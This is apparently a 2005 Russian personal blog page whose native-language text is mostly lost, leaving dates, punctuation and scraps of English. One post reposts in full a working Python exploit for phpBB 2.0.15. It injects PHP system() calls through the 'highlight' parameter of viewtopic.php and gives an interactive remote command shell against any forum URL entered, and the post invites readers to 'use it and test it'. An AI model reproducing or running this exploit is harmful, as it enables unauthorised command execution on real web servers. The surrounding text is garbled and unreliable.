-

 -

   Ax31_T0rva1ds

 - e-mail

 

 -

 LiveInternet.ru:
: 26.06.2005
: 105
: 128
: 368

:

Stufff.


: (6), (11)
(0)

My Work

, 22 2005 . 23:55 +
Stufff

(1)

, 20 2005 . 11:03 +
=)
1121281377_ebashneft.jpg (397x297, 59Kb)
Stufff

(0)

%)

, 14 2005 . 23:00 +
Gheeeeeet

euro4.ru
Stufff

(0)

....

, 07 2005 . 20:09 +
....


Stufff

(2)

,

, 07 2005 . 20:03 +
, :

, , . , /. . . . . , , . ** . : " ."
Stufff

(0)

, 07 2005 . 20:01 +
. . . ( ) . ( ) - :" "" - !" , "" - , //////. : "H "!". " ?"- . " "" !"- - . .
Stufff

(0)

!!!!

, 07 2005 . 19:59 +
, :
- , , , ...
... , , .
:
-, , ...
...
- ...
...
- ...
, :
, , ...
Stufff

(9)

.

, 05 2005 . 12:25 +
Stufff

(0)

?

, 04 2005 . 22:36 +
Stufff

(5)

=)

, 04 2005 . 22:34 +
Stufff

(0)

New cool service on the web

, 04 2005 . 22:32 +
Stufff

(9)

My Workspace .

, 03 2005 . 18:34 +
Stufff

(3)

, 03 2005 . 16:47 +
Stufff

(0)

.

, 03 2005 . 12:59 +
, ,
Stufff

(0)

phpBB 2.0.15 exploit use it and test it .

, 01 2005 . 21:50 +
#!/usr/bin/python

print "\nphpBB 2.0.15 arbitrary command execution eXploit"
print " 2005 by rattle@awarenetwork.org"
print " well, just because there is none."

import sys
from urllib2 import Request, urlopen
from urlparse import urlparse, urlunparse
from urllib import quote as quote_plus

INITTAG = ''
ENDTAG = '
'

def makecmd(cmd):
return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))


_ex = "%sviewtopic.php?t=%s&highlight=%%27."
_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
_ex += "printf(" + makecmd(ENDTAG) + ").%%27"


def usage():
print """Usage: %s

forum - fully qualified url to the forum
example: http://www.host.com/phpBB/

topic - ID of an existing topic. Well you
will have to check yourself.

"""[:-1] % sys.argv[0]; sys.exit(1)


if __name__ == '__main__':

if len(sys.argv) < 3 or not sys.argv[2].isdigit():
usage()
else:
print
url = sys.argv[1]
if url.count("://") == 0:
url = "http://" + url
url = list(urlparse(url))
host = url[1]
if not host: usage()

if not url[0]: url[0] = 'http'
if not url[2]: url[2] = '/'
url[3] = url[4] = url[5] = ''

url = urlunparse(url)
if url[-1] != '/': url += '/'

topic = quote_plus((sys.argv[2]))

while 1:

try:
cmd = raw_input("[%s]$ " % host).strip()
if cmd[-1]==';': cmd=cmd[:-1]

if (cmd == "exit"): break
else: cmd = makecmd(cmd)

out = _ex % (url,topic,cmd)

try: ret = urlopen(Request(out)).read()
except KeyboardInterrupt: continue
except: pass

else:
ret = ret.split(INITTAG,1)
if len(ret)>1: ret = ret[1].split(ENDTAG,1)
if len(ret)>1:
ret = ret[0].strip();
if ret: print ret
continue;

print "EXPLOIT FAILED"

except:
continue
Stufff


(2)

=)

, 01 2005 . 16:45 +
%))))
Stufff

(0)

....

, 01 2005 . 16:19 +
.
, .....
[RASTAFARAI*]
Stufff

(0)

, 01 2005 . 12:12 +
.
: " - , !"
********
H : " 1000 - 24 !"

**********
24 . 24 .. ?
Stufff

(2)

... .

, 01 2005 . 12:07 +
///
Stufff

(0)

, 01 2005 . 10:23 +
- Bingo - Track 2

Vlad Topalov - SMASH!!
1 14.00 LiveInternet .

.
. , .
;) .
.
, ( ) , .
. . " ( ) - !" " ... " " ? ( ) ;%: , , ."
... ... - , %:? .
Stufff



 : [2] 1